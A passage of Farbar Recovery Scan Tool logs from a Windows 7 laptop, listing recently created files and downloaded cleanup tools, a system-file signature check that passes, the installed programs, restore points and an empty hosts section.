2014-09-12 09:46 - 2014-09-12 09:46 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-10 19:41 - 2014-07-10 08:52 - 00000000 ___SD () C:\windows\system32\CompatTel
2014-09-10 19:41 - 2010-11-03 09:24 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-09-10 19:12 - 2010-11-03 09:27 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2014-09-10 17:35 - 2014-09-10 17:34 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader 9.lnk
2014-09-10 17:35 - 2014-09-10 17:34 - 00001955 _____ () C:\Users\Public\Desktop\Adobe Reader 9.lnk
2014-09-10 17:34 - 2014-09-10 17:34 - 00000000 ____D () C:\Program Files\Adobe
2014-09-10 17:34 - 2011-04-29 10:16 - 00000000 ____D () C:\Program Files\Common Files\Adobe
2014-09-10 17:34 - 2010-07-07 10:08 - 00000000 ____D () C:\ProgramData\Adobe
2014-09-10 17:33 - 2010-12-31 22:20 - 00000000 ____D () C:\Users\hesperia\AppData\Local\Adobe
2014-09-09 15:23 - 2014-09-09 15:23 - 01097728 _____ (Farbar) C:\Users\hesperia\Downloads\FRST.exe
2014-09-09 15:15 - 2014-09-09 15:12 - 05185536 _____ (AVAST Software) C:\Users\hesperia\Downloads\aswmbr.exe
2014-09-09 15:11 - 2014-09-09 14:33 - 00000000 ____D () C:\Users\hesperia\Downloads\backups
2014-09-09 14:47 - 2014-09-09 14:47 - 00001103 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00001091 _____ () C:\Users\Public\Desktop\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00000000 ____D () C:\Program Files\TeamViewer
2014-09-09 14:44 - 2014-09-09 14:44 - 00000000 ____D () C:\Program Files\Adblock Plus for IE
2014-09-09 14:41 - 2014-09-09 14:41 - 00113880 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\48230029.sys
2014-09-09 14:41 - 2014-09-09 14:41 - 00001031 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-09 14:41 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-09-09 14:40 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2011-04-29 10:03 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-09 14:35 - 2014-09-09 14:30 - 00000000 ____D () C:\AdwCleaner
2014-09-09 14:24 - 2014-09-09 14:24 - 00388608 _____ (Trend Micro Inc.) C:\Users\hesperia\Downloads\HijackThis.exe
2014-09-08 18:33 - 2014-09-08 18:32 - 00232208 _____ () C:\windows\Minidump\090814-36613-01.dmp
2014-09-08 18:32 - 2011-09-21 14:51 - 405289750 _____ () C:\windows\MEMORY.DMP
2014-09-08 18:32 - 2011-04-29 09:59 - 00000000 ____D () C:\windows\Minidump
2014-09-07 10:07 - 2009-07-14 10:37 - 00000000 ____D () C:\windows\system32\NDF
2014-09-05 09:42 - 2014-09-10 18:08 - 00444416 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-09-05 09:38 - 2014-09-10 18:08 - 00303104 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
2014-08-25 06:53 - 2012-04-24 14:35 - 00231584 ____N (Microsoft Corporation) C:\windows\system32\MpSigStub.exe
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\windows\explorer.exe => File is digitally signed
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-06 10:25
 
==================== End Of Log ============================

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 10-09-2014
Ran by hesperia at 2014-09-13 09:49:20
Running from E:\
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adblock Plus for IE (32-bit) (HKLM\...\{DF0E7912-4A45-4B24-B472-E521C4D2C663}) (Version: 99.9 - Eyeo GmbH)
Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.7.700.169 - Adobe Systems Incorporated)
Adobe Reader 9.5.5 (HKLM\...\{AC76BA86-7AD7-1033-7B44-A95000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Apple Application Support (HKLM\...\{EE6097DD-05F4-4178-9719-D3170BF098E8}) (Version: 1.4.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{308B6AEA-DE50-4666-996D-0FA461719D6B}) (Version: 3.3.0.69 - Apple Inc.)
Apple Software Update (HKLM\...\{C41300B9-185D-475E-BFEC-39EF732F19B1}) (Version: 2.1.2.120 - Apple Inc.)
Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.26 - Atheros Communications Inc.)
ATI Catalyst Install Manager (HKLM\...\{607CAF58-360F-8AB2-0E15-8B71B86E2390}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Bluetooth Stack for Windows by Toshiba (HKLM\...\{CEBB6BFB-D708-4F99-A633-BC2600E01EF6}) (Version: v7.10.10(T) - TOSHIBA CORPORATION)
Bonjour (HKLM\...\{2A981294-F14C-4F0F-9627-D793270922F8}) (Version: 2.0.4.0 - Apple Inc.)
Broadcom 802.11 Network Adapter (HKLM\...\Broadcom 802.11 Network Adapter) (Version: 5.60.48.35 - Broadcom Corporation)
BurnInTest v5.3 Pro (HKLM\...\BurnInTest_is1) (Version: 5.3 - Passmark Software)
Business Contact Manager for Outlook 2007 SP2 (HKLM\...\Business Contact Manager) (Version: 3.0.8619.1 - Microsoft Corporation)
Business Contact Manager for Outlook 2007 SP2 (Version: 3.0.8619.1 - Microsoft Corporation) Hidden
Canon Easy-WebPrint EX (HKLM\...\Easy-WebPrint EX) (Version:  - )
Canon MP Navigator EX 3.1 (HKLM\...\MP Navigator EX 3.1) (Version:  - )
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version:  - )
Canon Speed Dial Utility (HKLM\...\Speed Dial Utility) (Version:  - )
Canon Utilities Easy-PhotoPrint EX (HKLM\...\Easy-PhotoPrint EX) (Version:  - )
Canon Utilities My Printer (HKLM\...\CanonMyPrinter) (Version:  - )
Canon Utilities Solution Menu (HKLM\...\CanonSolutionMenu) (Version:  - )
Catalyst Control Center - Branding (Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center InstallProxy (Version: 2010.0315.1050.17562 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (Version: 2010.0315.1050.17562 - ATI) Hidden
CCC Help Chinese Standard (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Chinese Traditional (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Czech (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Danish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Dutch (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help English (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Finnish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help French (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help German (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Greek (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Hungarian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Italian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Japanese (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Korean (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Norwegian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Polish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Portuguese (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Russian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Spanish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Swedish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Thai (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Turkish (Version: 2010.0315.1049.17562 - ATI) Hidden
ccc-core-static (Version: 2010.0315.1050.17562 - ATI) Hidden
ccc-utility (Version: 2010.0315.1050.17562 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 3.05 - Piriform)
Cisco EAP-FAST Module (HKLM\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Conexant Audio Driver For AMD HDMI Codec (HKLM\...\CNXT_AUDIO_HDA_HDMI) (Version: 4.98.26.0 - Conexant)
Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 4.119.0.61 - Conexant)
Corel WinDVD (HKLM\...\{5C1F18D2-F6B7-4242-B803-B5A78648185D}) (Version: 10.0.5.822 - Corel Inc.)
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{650DE870-ECA3-4E63-8D77-778512BE5D4C}) (Version:  - Microsoft)
ESET Online Scanner v3 (HKLM\...\ESET Online Scanner) (Version:  - )
Intel® Management Engine Components (HKLM\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.8.0.1003 - Intel Corporation)
Intel® Turbo Boost Technology Driver (HKLM\...\{D6C630BF-8DBB-4042-8562-DC9A52CB6E7E}) (Version: 01.01.01.1007 - Intel Corporation)
iTunes (HKLM\...\{881F5DE8-9367-4B81-A325-E91BBC6472F9}) (Version: 10.1.1.4 - Apple Inc.)
Java™ 6 Update 17 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216017FF}) (Version: 6.0.170 - Sun Microsystems, Inc.)
Junk Mail filter update (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
LSI V92 MOH Application (HKLM\...\LTMOH) (Version:  - LSI Corporation)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6012.5000 - Microsoft Corporation) Hidden
Microsoft Choice Guard (Version: 2.0.48.0 - Microsoft Corporation) Hidden
Microsoft IntelliPoint 8.0 (HKLM\...\{00F93853-D9D3-4795-A89E-84CCBA0205C9}) (Version: 8.0.225.0 - Microsoft)
Microsoft Office 2003 Web Components (HKLM\...\{90A40409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office 2007 Primary Interop Assemblies (HKLM\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office Access MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Converter Pack (HKLM\...\{6EECB283-E65F-40EF-86D3-D51BF02A8D43}) (Version: 11.0.0.0 - Microsoft Corporation - Office Resource Kit Group)
Microsoft Office Excel MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Home and Student 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office OneNote MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Single Image 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Small Business Connectivity Components (HKLM\...\{A939D341-5A04-4E0A-BB55-3E65B386432D}) (Version: 2.0.7024.0 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Office Word MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2005 Express Edition (MSSMLBIZ) (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Express Edition (SQLEXPRESS) (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Tools Express Edition (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server Native Client (HKLM\...\{7670D32F-DAE6-4E49-8C8B-B3F08B5B1686}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{E7084B89-69E0-46B3-A118-8F99D06988CD}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
MSVCRT (Version: 14.0.1468.721 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PhotoScape (HKLM\...\PhotoScape) (Version:  - )
PlayReady PC Runtime x86 (HKLM\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
QuickTime (HKLM\...\{57752979-A1C9-4C02-856B-FBB27AC4E02C}) (Version: 7.69.80.9 - Apple Inc.)
Realtek USB 2.0 Card Reader (HKLM\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30111 - Realtek Semiconductor Corp.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (Version:  - Microsoft) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.0.8.1 - Synaptics Incorporated)
System Requirements Lab for Intel (HKLM\...\{CD41B576-4787-4D5C-95EE-24A4ABD89CD3}) (Version: 4.4.24.0 - Husdawg, LLC)
TeamViewer 6 (HKLM\...\TeamViewer 6) (Version: 6.0.17222 - TeamViewer GmbH)
TOSHIBA ConfigFree (HKLM\...\{607BE7BF-7C28-4ADB-A4A0-385962B901C3}) (Version: 8.0.28 - TOSHIBA Corporation)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.2 - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM\...\InstallShield_{53536479-DFB0-47ED-9D10-43F3708C222D}) (Version: 1.2.10.0 - TOSHIBA Corporation)
TOSHIBA eco Utility (Version: 1.2.10.0 - TOSHIBA Corporation) Hidden
TOSHIBA Hardware Setup (HKLM\...\{8E9CEA3B-EBD1-439C-A01D-830CB39613C6}) (Version: 2.00.06 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.0.6 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (Version: 3.1.0.6 - TOSHIBA Corporation) Hidden
TOSHIBA Media Controller (HKLM\...\{C7A4F26F-F9B0-41B2-8659-99181108CDE3}) (Version: 1.0.80.3 - TOSHIBA CORPORATION)
TOSHIBA Media Controller Plug-in (HKLM\...\{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}) (Version: 1.0.5.10 - TOSHIBA CORPORATION)
TOSHIBA Recovery Media Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.0.4 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.2.9 - TOSHIBA)
TOSHIBA Speech System Applications (HKLM\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version: 1.00.2518 - )
TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version:  - )
TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version:  - )
TOSHIBA Supervisor Password (HKLM\...\{073B89C3-BA88-41B5-965F-B35A88EAE838}) (Version: 2.00.03 - TOSHIBA Corporation)
TOSHIBA Value Added Package (HKLM\...\InstallShield_{FEDD27A0-B306-45EF-BF58-B527406B42C8}) (Version: 1.3.3 - TOSHIBA Corporation)
TOSHIBA Value Added Package (Version: 1.3.3 - TOSHIBA Corporation) Hidden
TOSHIBA Web Camera Application (HKLM\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.1.1.15 - TOSHIBA Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2600217) (Version: 1 - Microsoft Corporation)
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}) (Version:  - Microsoft)
Update for Microsoft Excel 2010 (KB2889836) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9179FC17-97A8-4D98-9E09-05720AF5D44E}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2494150) (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{3FCFD88F-4D13-4F38-8625-ABABEA7F61EA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687502) 32-Bit Edition (HKLM\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.SingleImage_{7DE7DF97-82FE-4B3A-AB8D-1621F9CC464A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F1A20C69-9FE5-40FD-9CD5-84EABC2EF64A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0D672F7-883E-4279-8E75-D97A5445AB46}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.SingleImage_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.SingleImage_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.SingleImage_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}) (Version:  - Microsoft)
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{7B29D8B8-6A87-496C-A65E-B935E740448A}) (Version:  - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{38CF30E4-3348-4BD1-A859-B630C355A56F}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2880529) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B9B89E01-5B6B-4F73-BC34-B2C0D8ACB4CD}) (Version:  - Microsoft)
Windows Live Call (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Communications Platform (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live Essentials (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (HKLM\...\{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Mail (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Messenger (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Movie Maker (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live Sync (HKLM\...\{B10914FD-8812-47A4-85A1-50FCDE7F1F33}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Live Writer (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
 
==================== Restore Points  =========================
 
13-09-2014 00:04:06 Windows 7 Service Pack 1
13-09-2014 00:24:09 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
